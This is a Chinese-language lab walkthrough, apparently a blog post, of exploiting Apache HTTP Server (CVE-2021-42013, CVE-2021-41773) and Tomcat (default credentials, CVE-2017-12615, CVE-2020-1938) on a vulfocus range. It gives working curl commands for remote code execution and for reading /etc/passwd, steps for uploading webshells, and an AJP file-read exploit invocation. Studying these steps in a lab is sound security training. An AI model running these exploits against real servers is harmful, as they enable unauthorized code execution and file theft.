中间件安全(apache、tomcat)

靶场:

vulfocus

Apache

Apache HTTP Server 是美国阿帕奇( Apache )基金会的一款开源网页服务器。该服务器具有快速、可靠且可通过简单的API进行扩充的特点,发现 Apache HTTP Server 2.4.50 中针对 CVE - 2021 - 41773 的修复不够充分。攻击者可以使用路径遍历攻击将 URL 映射到由类似别名的指令配置的目录之外的文件。如果这些目录之外的文件不受通常的默认配置"要求全部拒绝"的保护,则这些请求可能会成功。如果还为这些别名路径启用了 CGI 脚本,则这可能允许远程代码执行。此问题仅影响 Apache 2.4.49 和 Apache 2.4.50 ,而不影响更早版本。

CVE-2021-42013(RCE)

利用:

方式一:

curl --data "echo;id" 'http://192.168.222.8:54778//cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'

id就是我们要执行的命令

方式二:

直接以post方式提交数据包。数据就是要执行的命令。

POST /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh

通过执行命令我们也可以反弹shell。

CVE-2021-41773(目录穿越)

Apache HTTP Server 2.4.49、2.4.50版本对路径规范化所做的更改中存在一个路径穿越漏洞,攻击者可利用该漏洞读取到Web目录外的其他文件,如系统配置文件、网站源码等,甚至在特定情况下,攻击者可构造恶意请求执行命令,控制服务器。

利用:

方式一:
curl - v -- path - as - is

'http://xx.xx.xx.xx/icons/../../../../etc/passwd' 读取etc.passwd文件

成功读取/etc/passwd文件内容:

方式二:

利用BP直接发送数据包:

Tomcat

弱口令

这里有个后台管理功能,我们可以弱口令或者爆破进入后台。(默认:tomcat tomcat)

在后台有一个上传文件的功能。

我们可以生成一个jsp后门代码(1.jsp),然后压缩成war文件(1.war)。

CVE-2017-12615(文件上传)

Tomcat 是一个小型的轻量级应用服务器,在中小型系统和并发访问用户不是很多的场合下被普遍使用,是开发和调试JSP 程序的首选。 攻击者将有可能可通过精心构造的攻击请求数据包向服务器上传包含任意代码的 JSP 的webshell文件,JSP文件中的恶意代码将能被服务器执行,导致服务器上的数据泄露或获取服务器权限。

影响版本:Apache Tomcat 7.0.0 - 7.0.79

利用:

直接抓取数据包,然后以PUT形式提交数据包(数据包可以是一个后门代码)

发送该数据包之后就会创建一个1.jsp文件。

CVE-2020-1938(文件包含)

Apache Tomcat AJP协议(默认 8009 端口)由于存在实现缺陷导致相关参数可控,攻击者利用该漏洞可通过构造特定参数,读取服务器webapp目录下的任意文件。若服务器端同时存在文件上传功能,攻击者可进一步结合文件包含实现远程代码的执行。

漏洞影响的产品版本包括:

Tomcat 6.*

Tomcat 7.* < 7.0.100

Tomcat 8.* < 8.5.51

Tomcat 9.* < 9.0.31

利用:
脚本:https :// github . com / YDHCUI / CNVD - 2020 - 10487 - Tomcat - Ajp - lfi

python .\CNVD-2020-10487-Tomcat-Ajp-lfi.py 47.98.193.176 -p 35839 -f WEB-INF/web.xml

使用python2

相关推荐
用户9623779544820 小时前
VulnHub DC-3 靶机渗透测试笔记
安全
叶落阁主2 天前
Tailscale 完全指南:从入门到私有 DERP 部署
运维·安全·远程工作
用户962377954484 天前
DVWA 靶场实验报告 (High Level)
安全
数据智能老司机4 天前
用于进攻性网络安全的智能体 AI——在 n8n 中构建你的第一个 AI 工作流
人工智能·安全·agent
数据智能老司机4 天前
用于进攻性网络安全的智能体 AI——智能体 AI 入门
人工智能·安全·agent
用户962377954484 天前
DVWA 靶场实验报告 (Medium Level)
安全
red1giant_star4 天前
S2-067 漏洞复现:Struts2 S2-067 文件上传路径穿越漏洞
安全
用户962377954484 天前
DVWA Weak Session IDs High 的 Cookie dvwaSession 为什么刷新不出来?
安全
cipher6 天前
ERC-4626 通胀攻击:DeFi 金库的"捐款陷阱"
前端·后端·安全
一次旅行9 天前
网络安全总结
安全·web安全